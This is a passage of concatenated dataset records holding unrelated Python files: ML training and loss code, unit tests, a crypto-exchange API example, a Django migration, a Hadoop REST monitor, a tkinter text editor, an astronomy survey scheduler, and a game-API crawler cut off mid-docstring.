Forward step\r\n with tf.GradientTape(persistent=True) as tape:\r\n outputs = net(model_inputs) * 10.0 # We found that this factor can speed up training\r\n\r\n samples = tf.transpose(outputs, (3, 0, 1, 2))\r\n # Denormalize\r\n samples = samples * std + mean\r\n\r\n pn2v = (noise_model is not None) and (not supervised)\r\n\r\n likelihoods = noise_model.likelihood(labels, samples)\r\n likelihoods_avg = tf.math.log(tf.reduce_mean(likelihoods, axis=0, keepdims=True)[0, ...])\r\n\r\n # Average over pixels and batch\r\n masks = tf.squeeze(masks)\r\n loss = -tf.reduce_sum(likelihoods_avg * masks) / tf.reduce_sum(masks)\r\n\r\n gradients = tape.gradient(loss, net.trainable_variables)\r\n optimizer.apply_gradients(zip(gradients, net.trainable_variables))\r\n return loss\r\n\r\n\r\ndef loss_n2v(samples, labels, masks):\r\n '''\r\n The loss function as described in Eq. 7 of the paper.\r\n '''\r\n\r\n errors = (labels - tf.reduce_mean(samples, axis=0)) ** 2\r\n\r\n # Average over pixels and batch\r\n loss = tf.reduce_sum(errors * masks) / tf.reduce_sum(masks)\r\n return loss\r\n\r\n\r\ndef loss_pn2v(samples, labels, masks, noiseModel):\r\n '''\r\n The loss function as described in Eq. 7 of the paper.\r\n '''\r\n\r\n likelihoods = noiseModel.likelihood(labels, samples)\r\n likelihoods_avg = tf.math.log(tf.reduce_mean(likelihoods, axis=0, keepdims=True)[0, ...])\r\n\r\n # Average over pixels and batch\r\n masks = tf.squeeze(masks)\r\n loss = -tf.reduce_sum(likelihoods_avg * masks) / tf.reduce_sum(masks)\r\n return loss\r\n\r\n\r\ndef loss_obj(samples, labels, masks, noiseModel, pn2v, std=None):\r\n if pn2v:\r\n return loss_pn2v(samples, labels, masks, noiseModel)\r\n else:\r\n return loss_n2v(samples, labels, masks) / (std ** 2)\r\n\r\n\r\ndef train_network(net, train_data, val_data, noise_model, postfix,\r\n directory='.',\r\n epochs=200, steps_per_epoch=50,\r\n batch_size=4, patch_size=100,\r\n num_masked_pixels=100 * 100 / 32.0,\r\n virtual_batch_size=20, val_size=20,\r\n augment=True,\r\n supervised=False\r\n ):\r\n '''\r\n Train a network using PN2V\r\n\r\n Parameters\r\n ----------\r\n net:\r\n The network we want to train.\r\n The number of output channels determines the number of samples that are predicted.\r\n train_data: numpy array\r\n Our training image. A 3D array that is interpreted as a stack of 2D images.\r\n val_data: numpy array\r\n Our validation image. A 3D array that is interpreted as a stack of 2D images.\r\n noiseModel: NoiseModel\r\n The noise model we will use during training.\r\n postfix: string\r\n This identifier is attached to the names of the files that will be saved during training.\r\n directory: string\r\n The directory all files will be saved to.\r\n epochs: int\r\n Number of training epochs.\r\n steps_per_epoch: int\r\n Number of gradient steps per epoch.\r\n batch_size: int\r\n The batch patch_size, i.e. the number of patches processed simultainasly on the GPU.\r\n patch_size: int\r\n The width and height of the square training patches.\r\n num_masked_pixels: int\r\n The number of pixels that is to be manipulated/masked N2V style in every training patch.\r\n virtual_batch_size: int\r\n The number of batches that are processed before a gradient step is performed.\r\n val_size: int\r\n The number of validation patches processed after each epoch.\r\n augment: bool\r\n should the patches be randomly flipped and rotated?\r\n\r\n\r\n Returns\r\n ----------\r\n train_hist: numpy array\r\n A numpy array containing the avg. training loss of each epoch.\r\n val_hist: numpy array\r\n A numpy array containing the avg. validation loss after each epoch.\r\n '''\r\n\r\n # Calculate mean and std of image.\r\n combined = np.concatenate((train_data, val_data))\r\n net.mean = np.mean(combined)\r\n net.std = np.std(combined)\r\n\r\n # Everything that is processed by the net will be normalized and denormalized using these numbers.\r\n # TODO: Figure out how to get the reduce learning rate thing to work\r\n lr_schedule = 1e-4\r\n # lr_schedule = tf.keras.callbacks.ReduceLROnPlateau(monitor='min', patience=10, factor=0.5, verbose=True)\r\n optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)\r\n\r\n running_loss = 0.0\r\n data_counter = 0\r\n\r\n train_hist = []\r\n val_hist = []\r\n\r\n losses = []\r\n for epoch in range(epochs):\r\n for _ in range(steps_per_epoch):\r\n for a in range(virtual_batch_size):\r\n loss = training_pred(train_data,\r\n net,\r\n data_counter,\r\n patch_size,\r\n batch_size,\r\n num_masked_pixels,\r\n augment=augment,\r\n supervised=supervised,\r\n noise_model=noise_model,\r\n optimizer=optimizer)\r\n\r\n running_loss += loss\r\n losses.append(loss)\r\n\r\n running_loss = (np.mean(losses))\r\n losses = np.array(losses)\r\n print(f\"Epoch: {epoch}, avg. loss: {np.mean(losses)} +-(2SEM) {2.0 * np.std(losses) / np.sqrt(losses.size)}\")\r\n train_hist.append(np.mean(losses))\r\n tf.saved_model.save(net, os.path.join(directory, \"last_\" + postfix + \".net\"))\r\n\r\n val_counter = 0\r\n net.trainable = False\r\n val_losses = []\r\n for i in range(val_size):\r\n loss = training_pred(val_data,\r\n net,\r\n val_counter,\r\n patch_size,\r\n batch_size,\r\n num_masked_pixels,\r\n augment=augment,\r\n supervised=supervised,\r\n noise_model=noise_model,\r\n optimizer=optimizer)\r\n val_losses.append(loss)\r\n net.trainable = True\r\n\r\n avg_val_loss = np.mean(val_losses)\r\n if len(val_hist) == 0 or avg_val_loss < np.min(np.array(val_hist)):\r\n tf.saved_model.save(net, os.path.join(directory, \"best_\" + postfix + \".net\"))\r\n val_hist.append(avg_val_loss)\r\n np.save(os.path.join(directory, \"history\" + postfix + \".npy\"),\r\n (np.array([np.arange(epoch), train_hist, val_hist])))\r\n\r\n return train_hist, val_hist\r\n","sub_path":"noise_models/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":15357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"513125192","text":"import unittest\nimport os\nimport sys\n\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\n\nfrom custom_object import CustomObject\nfrom readers.xml_reader import XmlReader\n\nclass Test_XmlReader(unittest.TestCase):\n\n def test_custom_object_load_with_bad_file_path_verify_sys_exit_is_called(self):\n with self.assertRaises(SystemExit):\n custom_object = CustomObject()\n reader = XmlReader(\"bad-path.bad\")\n custom_object.load(reader.data)\n\n def test_custom_object_load_with_invalid_file_verify_sys_exit_is_called(self):\n with self.assertRaises(SystemExit):\n custom_object = CustomObject()\n reader = XmlReader(\"sample.yml\")\n custom_object.load(reader.data)\n \n def test_custom_object_load_with_good_data_verify_field_contents_are_correct(self):\n custom_object = CustomObject()\n reader = XmlReader(\"sample.xml\")\n custom_object.load(reader.data)\n self.assertEqual(custom_object.username, \"fake-username\") \n self.assertEqual(custom_object.password, \"fake-password\") \n self.assertEqual(custom_object.base_url, \"https://www.fake-url.com\")\n self.assertEqual(len(custom_object.objects), 3)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_xml_reader.py","file_name":"test_xml_reader.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"644428060","text":"import torch\nfrom torch import nn\n\n\nclass LabelSmoothingLoss(nn.Module):\n def __init__(self, num_classes: int, smoothing: float = 0.0,\n dim: int = -1):\n super(LabelSmoothingLoss, self).__init__()\n self.smoothing = smoothing\n self.confidence = 1.0 - self.smoothing\n self.num_classes = num_classes\n self.dim = dim\n\n def forward(self, pred: torch.Tensor, target: torch.Tensor):\n pred = pred.log_softmax(dim=self.dim)\n with torch.no_grad():\n true_dist = torch.zeros_like(pred)\n true_dist.fill_(self.smoothing / (self.num_classes - 1))\n true_dist.scatter_(1, target.data.unsqueeze(1), self.confidence)\n return torch.mean(torch.sum(-true_dist * pred, dim=self.dim))","sub_path":"interactive_spectrogram_inpainting/utils/losses/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"600626151","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nimport sys\nfrom pprint import pprint\n\nroot = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(root + '/python')\n\nimport ccxt.async_support as ccxt # noqa: E402\n\n\nasync def loop(exchange):\n while True:\n try:\n balance = await exchange.fetch_balance({\n 'type': 'margin',\n })\n pprint(balance)\n except Exception as e:\n print('fetch_balance() failed')\n print(e)\n\n\nasync def main():\n exchange = ccxt.okex({\n 'apiKey': 'YOUR_API_KEY',\n 'secret': 'YOUR_SECRET',\n # okex requires this: https://github.com/ccxt/ccxt/wiki/Manual#authentication\n 'password': 'YOUR_API_PASSWORD'\n })\n await loop(exchange)\n await exchange.close()\n\n\nasyncio.run(main())\n","sub_path":"examples/py/async-okex-fetch-margin-balance-with-params.py","file_name":"async-okex-fetch-margin-balance-with-params.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"17759909","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('offers', '0006_auto_20160614_1823'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Tcat',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('title', models.CharField(max_length=256, help_text='Введите название', verbose_name='Название Категории')),\n ('clicks', models.IntegerField(verbose_name='Клики', default=0)),\n ('metadescription', models.TextField(max_length=10000, verbose_name='meta description', blank=True)),\n ('metatitle', models.TextField(max_length=10000, verbose_name='meta title', blank=True)),\n ('metakeywords', models.TextField(max_length=10000, verbose_name='Ключевые слова', blank=True)),\n ('text1', models.TextField(max_length=10000, verbose_name='Описание1', blank=True)),\n ('text2', models.TextField(max_length=10000, verbose_name='Описание2', blank=True)),\n ('parent', models.IntegerField(null=True, verbose_name='Родительская категория', default=0, blank=True)),\n ('active', models.BooleanField(verbose_name='Активная', default=True)),\n ('sort', models.IntegerField(null=True, verbose_name='Сортировка', default=0, blank=True)),\n ('img', models.CharField(max_length=1000, verbose_name='Изображение', blank=True)),\n ],\n options={\n 'verbose_name_plural': 'Категории',\n 'verbose_name': 'Категория',\n },\n ),\n migrations.CreateModel(\n name='Tcatb',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('title', models.CharField(max_length=256, help_text='Введите название', verbose_name='Название Категории')),\n ('parent', models.IntegerField(null=True, verbose_name='Родительская категория', default=0, blank=True)),\n ('idbroker', models.CharField(max_length=200, verbose_name='ID категории у брокера', blank=True)),\n ('active', models.BooleanField(verbose_name='Активная', default=True)),\n ('broker', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='offers.Brokers', verbose_name='Площадка офера')),\n ('cat', models.ManyToManyField(to='tovars.Tcat')),\n ],\n options={\n 'verbose_name_plural': 'Категории брокера',\n 'verbose_name': 'Категория брокера',\n },\n ),\n migrations.CreateModel(\n name='Tovars',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('title', models.CharField(max_length=10000, blank=True, help_text='Введите название', verbose_name='Название')),\n ('img', models.CharField(max_length=10000, verbose_name='Изображение', blank=True)),\n ('link', models.CharField(max_length=1000, verbose_name='Реальная ссылка', blank=True)),\n ('description', models.TextField(max_length=5000, verbose_name='Информация', blank=True)),\n ('meta_description', models.TextField(max_length=5000, verbose_name='Мета тэг', blank=True)),\n ('meta_keywords', models.TextField(max_length=10000, verbose_name='Мета тэг', blank=True)),\n ('idbroker', models.CharField(max_length=200, verbose_name='ID товара у брокера', blank=True)),\n ('price', models.DecimalField(max_digits=19, decimal_places=2)),\n ('clicks', models.IntegerField(default=0)),\n ('date', models.DateTimeField(auto_now_add=True, null=True)),\n ('rating', models.CharField(max_length=256, verbose_name='Рейтинг', blank=True)),\n ('active', models.BooleanField(verbose_name='Активная', default=True)),\n ('catb', models.ForeignKey(to='tovars.Tcatb', verbose_name='Категория брокера', null=True)),\n ('offer', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='offers.Offers', verbose_name='Оофер')),\n ],\n options={\n 'verbose_name_plural': 'Товары',\n 'verbose_name': 'Товар',\n },\n ),\n ]\n","sub_path":"tovars/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"644108894","text":"import requests as request\nimport time\n\ndef getAllApplicationsIdList(proxies=None):\n\n requestLinkString = 'http://localhost:8088/ws/v1/cluster/apps'\n allApplications = request.get(requestLinkString,proxies=proxies).json()\n \n #If there is no application running currently\n if(allApplications['apps'] == None):\n return\n else:\n applicationDetailList = allApplications['apps']['app']\n applicationIdList = [applicationDetail['id'] for applicationDetail in applicationDetailList]\n return applicationIdList\n \n \n \ndef getAllJobsIdList(applicationId , proxies=None):\n requestLinkString = \"http:///proxy/\" + applicationId + \"/ws/v1/mapreduce/jobs\"\n allJobs = request.get(requestLinkString,proxies=proxies).json()\n \n #If there are no Jobs running for the given application Id\n if(allJobs['jobs']==None):\n return\n else:\n jobDetailList = allJobs['jobs']['job']\n jobIdList = [str(jobDetail['id']) for jobDetail in jobDetailList]\n return jobIdList\n\n \n\ndef getNewCompletedTasks(applicationId , jobId , alreadyReportedTasks , proxies = None):\n \n requestLinkString = \"http:///proxy/\" + applicationId + \"/ws/v1/mapreduce/jobs/\"+jobId+\"/tasks\"\n \n allTasks = request.get(requestLinkString,proxies=proxies).json()\n \n if(allTasks['tasks'] == None):\n print('No running task for this' + 'Application ID: ' +applicationId +' Job Id: ' +jobId)\n return\n \n else:\n \n taskDetailList = allTasks['tasks']['task']\n \n #Logic to get the non reported completed task goes here\n \n newCompletedTaskIdList = [str(taskDetail['id']) for taskDetail in taskDetailList if str(taskDetail['state'])=='SUCCEEDED'\n and str(taskDetail['id']) not in alreadyReportedTasks]\n \n return newCompletedTaskIdList \n \n\n\ndef getSuccessfulTaskAttemptId(applicationId , jobId , taskId , proxies = None):\n \n requestLinkString = \"http:///proxy/\"+applicationId+\"/ws/v1/mapreduce/jobs/\"+jobId+\"/tasks/\"+taskId+\"/attempts\"\n \n allTaskAttempts = request.get(requestLinkString,proxies=proxies).json()\n if(allTaskAttempts['taskAttempts'] == None):\n print('No attempt has made till now for applicationId '+applicationId+' jobId '+jobId+' taskId '+taskId)\n return\n else:\n \n allTaskAttemptDetaillist = allTaskAttempts['taskAttempts']['taskAttempt']\n successfulTaskAttemptIdList = [str(allTaskAttemptDetail['id']) for allTaskAttemptDetail in allTaskAttemptDetaillist \n if str(allTaskAttemptDetail['state']) == 'SUCCEEDED' ]\n return successfulTaskAttemptIdList\n\n\n \n\ndef getTaskCounter(applicationId , jobId , taskId , attemptId , proxies = None):\n \n requestLinkString = \"http:///proxy/\"+applicationId+\"/ws/v1/mapreduce/jobs/\"+jobId+\"/tasks/\"+taskId+\"/attempts/\"+attemptId+\"/counters\"\n \n TaskCounter = request.get(requestLinkString,proxies=proxies).json()\n \n if(TaskCounter['JobTaskAttemptCounters']==None):\n print('There is no task counter data available for attemptId '+attemptId+' Task Id'+ taskId)\n else:\n return TaskCounter \n \n \ndef getNodeOfTask(applicationId , jobId , taskId , attemptId ,proxies = None):\n \n requestLinkString = \"http:///proxy/\" +applicationId +\"/ws/v1/mapreduce/jobs/\"+jobId+\"/tasks/\"+taskId+\"/attempts\"\n \n #allTaskAttempts = request.get(requestLinkString,proxies=proxies).json()\n \n if(allTaskAttempts['taskAttempts'] == None):\n print('No attempt has made till now for applicationId '+applicationId+' jobId '+jobId+' taskId '+taskId)\n return\n else:\n \n allTaskAttemptDetaiList = allTaskAttempts['taskAttempts']['taskAttempt']\n taskNodeDetailTuple = [( str(allTaskAttemptDetail['nodeHttpAddress']) , str(allTaskAttemptDetail['rack']) )\n for allTaskAttemptDetail in allTaskAttemptDetaiList \n if str(allTaskAttemptDetail['id']) == attemptId ]\n return taskNodeDetailTuple \n \n\n\nif __name__=='__main__':\n \n#In case of Proxy Server Authentication required , Please put the user , password , ip and port of Client side in the respective variable\n#USER =''\n#PASSWORD=''\n#IP=''\n#PORT=''\n#proxies = { 'http' : 'http://user:password@ip:port' , 'https' : 'https://user:password@ip:port' }\n \n # If you have given the proxy above , please remoove the variable\n proxies = None\n print(\"All the running Application's ID\")\n \n allApplicationsIdList = getAllApplicationsIdList(proxies=proxies)\n \n if(allApplicationsIdList != None) :\n #printing all the Application Id\n for applicationId in allApplicationsIdList:\n print(applicationId)\n \n print('Please enter the Application ID for toget all the Job Id for the application')\n appId = str(input())\n \n jobIdList = getAllJobsIdList(applicationId = appId , proxies=proxies)\n \n if(jobIdList != None):\n print('All the jobs for application: '+appId)\n for jobId in jobIdList:\n print(jobId)\n \n print('Please enter the job Id to get all the task detail for the job')\n jId = str(input())\n #As in the beginning there is no task reported , so empty list is declared\n alreadyReportedTasks = []\n \n while True:\n newCompletedTasks = getNewCompletedTasks(applicationId = appId , jobId = jId , alreadyReportedTasks = alreadyReportedTasks , proxies=proxies)\n \n if(newCompletedTasks != None): \n for newCompletedTask in newCompletedTasks:\n #The programmer for this code has assumed that there will be only one successfulTaskAttemptId per Task .\n successfulTaskAttemptId = getSuccessfulTaskAttemptId(applicationId = appId , jobId = jId , taskId = newCompletedTask , proxies=proxies)[0]\n taskCounter = getTaskCounter(applicationId = appId, jobId = jId, taskId = newCompletedTask, attemptId = successfulTaskAttemptId , proxies=proxies)\n print('TaskCounter for the Task: '+newCompletedTask)\n print(taskCounter)\n \n nodeOfTask = getNodeOfTask(applicationId = appId, jobId = jId , taskId =newCompletedTask, attemptId = successfulTaskAttemptId , proxies=proxies)\n \n print('Node Http Address and the rack for the Node on which task completed')\n print(nodeOfTask)\n \n alreadyReportedTasks.extend(newCompletedTasks) \n \n #sleeps for 20 seconds \n time.sleep(20) \n \n else:\n print('No job running for the Application Id: '+appId) \n \n else:\n print('No Application running currently') \n \n \n","sub_path":"HadoopJobTracker.py","file_name":"HadoopJobTracker.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"125144779","text":"import tkinter as tk #tk is a class in tkinter\nfrom tkinter import ttk\nfrom tkinter import font,colorchooser,filedialog,messagebox\nimport os\n\nmain_application=tk.Tk() \n#tk is alias of tkinter \n# main_application is object\n# Tk is class in tkinter\nmain_application.geometry('1200x800')\nmain_application.title('Text Editor')\n\n####################### main menu ###############################\n\nmain_menu = tk.Menu()\n\n\n##---------------file------------------##\nnew_icon = tk.PhotoImage(file='icons2/new.png')\nopen_icon = tk.PhotoImage(file='icons2/open.png')\nsave_icon = tk.PhotoImage(file='icons2/save.png')\nsave_as_icon = tk.PhotoImage(file='icons2/save_as.png')\nexit_icon = tk.PhotoImage(file='icons2/exit.png')\n\nfile = tk.Menu(main_menu, tearoff=False)\n\n\n\n\n##--------------edit------------------## \ncopy_icon = tk.PhotoImage(file='icons2/copy.png')\npaste_icon = tk.PhotoImage(file='icons2/paste.png')\ncut_icon = tk.PhotoImage(file='icons2/cut.png')\nclear_all_icon = tk.PhotoImage(file='icons2/clear_all.png')\nfind_icon = tk.PhotoImage(file='icons2/find.png')\n\nedit = tk.Menu(main_menu, tearoff=False)\n\n\n##-------------view---------------------## \ntool_bar_icon = tk.PhotoImage(file='icons2/tool_bar.png')\nstatus_bar_icon = tk.PhotoImage(file='icons2/status_bar.png')\n\nview = tk.Menu(main_menu, tearoff=False)\n\n\n##-------------color theme--------------## \nlight_default_icon = tk.PhotoImage(file='icons2/light_default.png')\nlight_plus_icon = tk.PhotoImage(file='icons2/light_plus.png')\ndark_icon = tk.PhotoImage(file='icons2/dark.png')\nred_icon = tk.PhotoImage(file='icons2/red.png')\nmonokai_icon = tk.PhotoImage(file='icons2/monokai.png')\nnight_blue_icon = tk.PhotoImage(file='icons2/night_blue.png')\n\ncolor_theme = tk.Menu(main_menu, tearoff=False)\n\ntheme_choice = tk.StringVar()\ncolor_icons = (light_default_icon, light_plus_icon, dark_icon, red_icon, monokai_icon, night_blue_icon)\n\ncolor_dict = { \n 'Light Default ' : ('#000000', '#ffffff'), \n 'Light Plus' : ('#474747', '#e0e0e0'),\n 'Dark' : ('#c4c4c4', '#2d2d2d'),\n 'Red' : ('#2d2d2d', '#ffe8e8'),\n 'Monokai' : ('#d3b774', '#474747'),\n 'Night Blue' :('#ededed', '#6b9dc2')\n }\n\n\n#-----Adding file/edit/view/colortheme to menu-----------------#\nmain_menu.add_cascade(label='File', menu=file)\nmain_menu.add_cascade(label='Edit', menu=edit)\nmain_menu.add_cascade(label='View', menu=view)\nmain_menu.add_cascade(label='Color Theme', menu=color_theme)\n\n#----filedropdown-----#\nfile.add_command(label='New', image=new_icon, compound=tk.LEFT, accelerator='Ctrl+N')\nfile.add_command(label='Open', image=open_icon, compound=tk.LEFT, accelerator='Ctrl+O')\nfile.add_command(label='Save', image=save_icon, compound=tk.LEFT, accelerator='Ctrl+S')\nfile.add_command(label='Save As', image=new_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+S')\nfile.add_command(label='Exit', image=exit_icon, compound=tk.LEFT, accelerator='Ctrl+Q')\n\n#----editdropdown-----# \nedit.add_command(label='Copy', image=copy_icon, compound=tk.LEFT, accelerator='Ctrl+C')\nedit.add_command(label='Paste', image=paste_icon, compound=tk.LEFT, accelerator='Ctrl+V')\nedit.add_command(label='Cut', image=cut_icon, compound=tk.LEFT, accelerator='Ctrl+X')\nedit.add_command(label='Clear All', image=clear_all_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+X')\nedit.add_command(label='Find', image=find_icon, compound=tk.LEFT, accelerator='Ctrl+F')\n\n#----viewdropdown-----#\nview.add_checkbutton(label='Tool Bar', image=tool_bar_icon, compound=tk.LEFT)\nview.add_checkbutton(label='Status Bar', image=status_bar_icon, compound=tk.LEFT)\n\ncount = 0 \nfor i in color_dict:\n color_theme.add_radiobutton(label = i, image=color_icons[count], variable=theme_choice, compound=tk.LEFT)\n count += 1 \n\n\n\n\n######################tool bar ##################################\n\ntool_bar = ttk.Label(main_application) # label will display the box where you can place text or images. The text displayed by this widget can be updated at any time you want.\ntool_bar.pack(side=tk.TOP , fill=tk.X) #pack() method declares the position of widgets in relation to each other.\n\n#font box\nfont_tuple = tk.font.families() #It will give all the font families present in the tk.\nfont_family = tk.StringVar()\nfont_box=ttk.Combobox(tool_bar,width=30,textvariable=font_family,state='readonly') #Combobox is the drop-down list.\nfont_box['values']=font_tuple\nfont_box.current(font_tuple.index('Arial'))\nfont_box.grid(row=0,column=0,padx=5) #grid widget is split into a number of rows and columns\n\n#size box\nsize_var = tk.IntVar()\nfont_size=ttk.Combobox(tool_bar,width=14,textvariable=size_var,state='readonly') #Combobox is for drop-down list.\nfont_size['values']=tuple(range(8,80,2))\nfont_size.current(4)\nfont_size.grid(row=0, column=1, padx=5) #grid widget is used to split into a number of rows and columns\n\n## bold button \nbold_icon = tk.PhotoImage(file='icons2/bold.png') # photoimage is Used to add the images\nbold_btn = ttk.Button(tool_bar, image=bold_icon) #button is used to add buttons\nbold_btn.grid(row=0, column=2, padx=5) #grid widget is split into a number of rows and columns\n\n## italic button \nitalic_icon = tk.PhotoImage(file='icons2/italic.png') # photoimage is Used to add the images\nitalic_btn = ttk.Button(tool_bar, image=italic_icon)#button is used to add buttons\nitalic_btn.grid(row=0, column=3, padx=5) #grid widget is split into a number of rows and columns\n\n## underline button \nunderline_icon = tk.PhotoImage(file='icons2/underline.png') # photoimage is Used to add the images\nunderline_btn = ttk.Button(tool_bar, image = underline_icon) #button is used to add buttons\nunderline_btn.grid(row = 0, column=4, padx=5) #grid widget is split into a number of rows and columns\n\n## font color button \nfont_color_icon = tk.PhotoImage(file='icons2/font_color.png') # photoimage is Used to add the images\nfont_color_btn = ttk.Button(tool_bar, image=font_color_icon) #button is used to add buttons\nfont_color_btn.grid(row=0, column=5,padx=5) #grid widget is split into a number of rows and columns\n\n## align left \nalign_left_icon = tk.PhotoImage(file='icons2/align_left.png') # photoimage is Used to add the images\nalign_left_btn = ttk.Button(tool_bar, image=align_left_icon) #button is used to add buttons\nalign_left_btn.grid(row=0, column=6, padx=5)#grid widget is split into a number of rows and columns\n\n## align center \nalign_center_icon = tk.PhotoImage(file='icons2/align_center.png') # photoimage is Used to add the images\nalign_center_btn = ttk.Button(tool_bar, image=align_center_icon) #button is used to add buttons\nalign_center_btn.grid(row=0, column=7, padx=5) #grid widget is split into a number of rows and columns\n\n## align right \nalign_right_icon = tk.PhotoImage(file='icons2/align_right.png') # photoimage is Used to add the images\nalign_right_btn = ttk.Button(tool_bar, image=align_right_icon) #button is used to add buttons\nalign_right_btn.grid(row=0, column=8, padx=5) #grid widget is split into a number of rows and columns\n\n######################End Tool Bar##############################\n\n######################text editor###############################\n\n#######################status bar###############################\n\n########################shortcut keys###########################\n\nmain_application.config(menu=main_menu)\nmain_application.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"373462523","text":"import numpy as np\nimport matplotlib.pylab as plt\nimport healpy as hp\nfrom lsst.sims.featureScheduler.modelObservatory import Model_observatory\nfrom lsst.sims.featureScheduler.schedulers import Core_scheduler\nfrom lsst.sims.featureScheduler.utils import standard_goals, calc_norm_factor\nimport lsst.sims.featureScheduler.basis_functions as bf\nfrom lsst.sims.featureScheduler.surveys import (generate_dd_surveys, Greedy_survey,\n Blob_survey, Pairs_survey_scripted)\nfrom lsst.sims.featureScheduler import sim_runner\n\n\ndef gen_greedy_surveys(nside, m5_weight=3., count_uniformity_weight=0.3,\n slewtime_weight=3., filter_change_weight=3.,\n filters = ['u', 'g', 'r', 'i', 'z', 'y'], add_DD=False,\n pairs=False):\n \"\"\"\n Make a quick set of greedy surveys\n \"\"\"\n sg = standard_goals(nside=nside)\n target_map = {}\n for key in filters:\n target_map[key] = sg[key]\n norm_factor = calc_norm_factor(target_map)\n surveys = []\n\n for filtername in filters:\n bfs = []\n bfs.append(bf.M5_diff_basis_function(filtername=filtername, nside=nside))\n bfs.append(bf.Target_map_basis_function(filtername=filtername,\n target_map=target_map[filtername],\n out_of_bounds_val=np.nan, nside=nside,\n norm_factor=norm_factor))\n bfs.append(bf.Slewtime_basis_function(filtername=filtername, nside=nside))\n bfs.append(bf.Strict_filter_basis_function(filtername=filtername))\n # Masks, give these 0 weight\n bfs.append(bf.Zenith_shadow_mask_basis_function(nside=nside, shadow_minutes=60., max_alt=76.))\n bfs.append(bf.Moon_avoidance_basis_function(nside=nside, moon_distance=40.))\n bfs.append(bf.Clouded_out_basis_function())\n\n bfs.append(bf.Filter_loaded_basis_function(filternames=filtername))\n\n weights = np.array([m5_weight, count_uniformity_weight, slewtime_weight, filter_change_weight,\n 0., 0., 0., 0.])\n surveys.append(Greedy_survey(bfs, weights, block_size=1, filtername=filtername,\n dither=True, nside=nside, ignore_obs='DD'))\n\n if pairs:\n surveys.append(Pairs_survey_scripted(None, ignore_obs='DD'))\n if add_DD:\n dd_surveys = generate_dd_surveys(nside=nside)\n surveys.extend(dd_surveys)\n\n return surveys\n","sub_path":"slair_examples/1filter/basic_survey.py","file_name":"basic_survey.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"488865749","text":"#!/usr/bin/python\n\nimport asyncio\nimport aiohttp\n\nTOKEN = \"aaa.bbb.ccc\"\nAPIURL = \"https://api.dc01.gamelockerapp.com/\"\n\n\nclass Crawler(object):\n def __init__(self):\n \"\"\"Sets constants.\"\"\"\n self._apiurl = APIURL\n self._token = TOKEN\n self._pagelimit = 50\n\n async def _req(self, session, path, params=None):\n \"\"\"Sends an API request and returns the response dict.\n\n :param session: aiohttp client session.\n :type session: :class:`aiohttp.ClientSession`\n :param path: URL path.\n :type path: str\n :param params: (optional) Request parameters.\n :type params: dict\n :return: API response.\n :rtype: dict\n \"\"\"\n headers = {\n \"Authorization\": \"Bearer \" + self._token,\n \"X-TITLE-ID\": \"semc-vainglory\",\n \"Accept\": \"application/vnd.api+json\",\n \"Content-Encoding\": \"gzip\"\n }\n async with session.get(self._apiurl + path, headers=headers,\n params=params) as response:\n assert response.status == 200\n return await response.json()\n\n async def version(self):\n \"\"\"Returns the current API version.\"\"\"\n\n async with aiohttp.ClientSession() as session:\n status = await self._req(session, \"status\")\n return status[\"data\"][\"attributes\"][\"version\"]\n\n async def matches(self, region=\"na\", params=None):\n \"\"\"Queries the API for matches and their related data.\n\n :param region: (optional) Region where the matches were played.\n Defaults to \"na\" (North America).\n :type region: str\n :param params: (optional) Additional filters.\n :type params: dict\n :return: Processed API response\n :rtype: list of dict\n \"\"\"\n forever = False # do not fetch until exhausted\n if params is None:\n params = dict()\n if \"page[limit]\" not in params:\n forever = True # no limit specified, fetch all we can\n params[\"page[limit]\"] = self._pagelimit\n if \"page[offset]\" not in params:\n params[\"page[offset]\"] = 0\n\n data = []\n async with aiohttp.ClientSession() as session:\n while True:\n params[\"page[offset]\"] += params[\"page[limit]\"]\n try:\n print(\"asking for more matches…\")\n res = await self._req(session,\n \"shards/\" + region + \"/matches\",\n params)\n except AssertionError:\n break\n\n data += res[\"data\"] + res[\"included\"]\n\n if not forever:\n break # stop after one iteration\n\n return data\n\n async def matches_since(self, date, region=\"na\", params=None):\n \"\"\"Queries the API for new matches since the given date.\n\n :param region: see `matches`\n :type region: str\n :param date: Start date in ISO8601 format.\n :type date: str\n :param params: (optional) Additional 